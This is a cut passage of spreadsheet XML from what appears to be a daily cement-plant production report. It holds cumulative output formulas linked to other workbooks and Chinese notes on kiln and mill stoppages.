      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]25'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]25'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]25'!$R$30</f>
        <v>202.14</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'24'!U51</f>
        <v>4264.57</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>67263.041</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]25'!$V$30</f>
        <v>120.9</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'24'!X51</f>
        <v>4256.788</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>64873.025</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]25'!$Y$30</f>
        <v>3259.15600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]25'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]25'!$E$19</f>
        <v>5190.99000000002</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'24'!H52</f>
        <v>25090.2700000005</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1408657.52</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]25'!$I$19</f>
        <v>2060.1</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'24'!K52</f>
        <v>93788.91</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1375483.11</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]25'!$L$19</f>
        <v>36347.8030000507</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>25.0674503448625</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'[13]25'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]25'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'24'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]25'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'24'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]25'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]25'!$M$21+'[14]25'!$M$22+'[14]25'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]25'!$N$21+'[14]25'!$N$22+'[14]25'!$N$35</f>
        <v>44.16</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'24'!U53</f>
        <v>1011.71</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>39346.137</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]25'!$Q$21+'[14]25'!$Q$22+'[14]25'!$Q$35</f>
        <v>26</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'24'!X53</f>
        <v>809</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40300</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]25'!$T$21+'[14]25'!$T$22+'[14]25'!$T$35</f>
        <v>1851.657</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]25'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'24'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]25'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'24'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]25'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]25'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]25'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]25'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'24'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]25'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'24'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]25'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]25'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'24'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]25'!$I$63</f>
        <v>0</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'24'!K55</f>
        <v>7077.925</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>42513.575</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]25'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]25'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]25'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]25'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]25'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]25'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]25'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]25'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]25'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'24'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'24'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]25'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：续停；2#磨：8:00-24:00避峰停机；3#磨：8:00-22:10避峰停机；4#磨：8:00-22:10避峰停机。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G57+'24'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'24'!K57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G58+'24'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'24'!K58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G59+'24'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'24'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]25'!$Q$65</f>
        <v>窑:错峰续停。A组磨：8:00-24:00焊辊面定检停机。D1#磨：正常，D2#磨：8:30-10:00避峰停机。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G60+'24'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'24'!K60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'[14]25'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]25'!$E$6</f>
        <v>3829</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'24'!H61</f>
        <v>95128</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1211001</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]25'!$E$21</f>
        <v>3711.5</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'24'!K61</f>
        <v>99009.96</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1200170.04</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]25'!$H$6</f>
        <v>33887.2099999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>65.1677115384613</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'[14]25'!$M$11+'[14]25'!$M$12+'[14]25'!$M$13+'[14]25'!$M$14+'[14]25'!$M$15+'[14]25'!$M$16+'[14]25'!$M$17+'[14]25'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]25'!$N$11+'[14]25'!$N$12+'[14]25'!$N$13+'[14]25'!$N$14+'[14]25'!$N$15+'[14]25'!$N$16+'[14]25'!$N$17+'[14]25'!$N$18</f>
        <v>2948</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'24'!H62</f>
        <v>67067</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>903060.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]25'!$Q$11+'[14]25'!$Q$12+'[14]25'!$Q$13+'[14]25'!$Q$14+'[14]25'!$Q$15+'[14]25'!$Q$16+'[14]25'!$Q$17+'[14]25'!$Q$18</f>
        <v>2846</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'24'!K62</f>
        <v>68492</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>902964.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]25'!$T$11+'[14]25'!$T$12+'[14]25'!$T$13+'[14]25'!$T$14+'[14]25'!$T$15+'[14]25'!$T$16+'[14]25'!$T$17+'[14]25'!$T$18</f>
        <v>17029.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>68.1185359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]25'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]25'!$M$19+'[14]25'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]25'!$N$19+'[14]25'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'24'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]25'!$Q$19+'[14]25'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'24'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]25'!$T$19+'[14]25'!$T$20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G64+'24'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'24'!K64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G65+'24'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'24'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]25'!$Q$74</f>
        <v>1#窑:续停；2#窑:熟料质量波动减产；1#磨:0:00-21:55库满停机。2#磨:0:00-19:00库满停机。3#磨:0:00-15:40，22:10-24:00库满停机。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G66+'24'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'24'!K66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G67+'24'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'24'!K67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'[15]25'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]25'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'24'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]25'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'24'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]25'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]25'!$Q$77</f>
        <v>1#磨8:00-22:15避峰停机:14.75小时(避峰)。2#磨14:30-22:15避峰停机:7.75小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]25'!$D$43+'[15]25'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]25'!$E$43+'[15]25'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'24'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]25'!$H$43+'[15]25'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'24'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]25'!$K$43+'[15]25'!$K$44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'[15]25'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]25'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'24'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]25'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'24'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]25'!$K$45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G71+'24'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'24'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]25'!$Q$80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G72+'24'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'24'!K72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G73+'24'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'24'!K73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G74+'24'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'24'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]25'!$Q$83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G75+'24'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'24'!K75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G76+'24'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'24'!K76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G77+'24'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'24'!K77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G78+'24'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'24'!K78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'[16]25'!$E$7</f>
        <v>624.66</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'24'!H79</f>
        <v>13298.78</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>160427.25</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]25'!$I$7</f>
        <v>274.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'24'!K79</f>
        <v>12342</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>154233.45</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]25'!$L$7</f>
        <v>5841.56</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>11.68312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'[16]25'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'24'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]25'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'24'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]25'!$Y$15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G81+'24'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'24'!K81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G82+'24'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'24'!K82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G83+'24'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'24'!K83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G84+'24'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'24'!K84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G85+'24'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'24'!K85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26/31</f>
        <v>0.838709677419355</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46017</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20800.1</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'25'!H5</f>
        <v>544220.69</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6699086.72</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>21294.74</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'25'!K5</f>
        <v>599813.197</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6749884.328</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>211875.317</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>56.6511542780748</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]26'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]26'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]26'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]26'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]26'!$U$101</f>
        <v>37.0139423076923</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]26'!$V$101</f>
        <v>62.6653472222222</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]26'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]26'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]26'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]26'!$D$23+'[11]26'!$D$17+'[12]26'!$D$17+'[13]26'!$D$25+'[14]26'!$D$8+'[14]26'!$D$15+'[15]26'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]26'!$E$23+'[11]26'!$E$17+'[12]26'!$E$17+'[13]26'!$E$25+'[14]26'!$E$8+'[14]26'!$E$15+'[15]26'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'25'!H6</f>
        <v>6590</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>282939.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]26'!$I$23+'[11]26'!$I$17+'[12]26'!$I$17+'[13]26'!$I$25+'[14]26'!$E$23+'[14]26'!$E$30+'[15]26'!$H$7</f>
        <v>806.07</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'25'!K6</f>
        <v>19435.59</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>281633.29</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]26'!$L$23+'[11]26'!$L$17+'[12]26'!$L$17+'[13]26'!$L$25+'[14]26'!$H$23+'[14]26'!$H$30+'[15]26'!$K$7</f>
        <v>19267.25</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]26'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]26'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]26'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]26'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]26'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]26'!$V$102</f>
        <v>32.9305439814815</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]26'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]26'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]26'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]26'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]26'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'25'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]26'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'25'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]26'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]26'!$W$107</f>
        <v>129.508196721311</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]26'!$X$107</f>
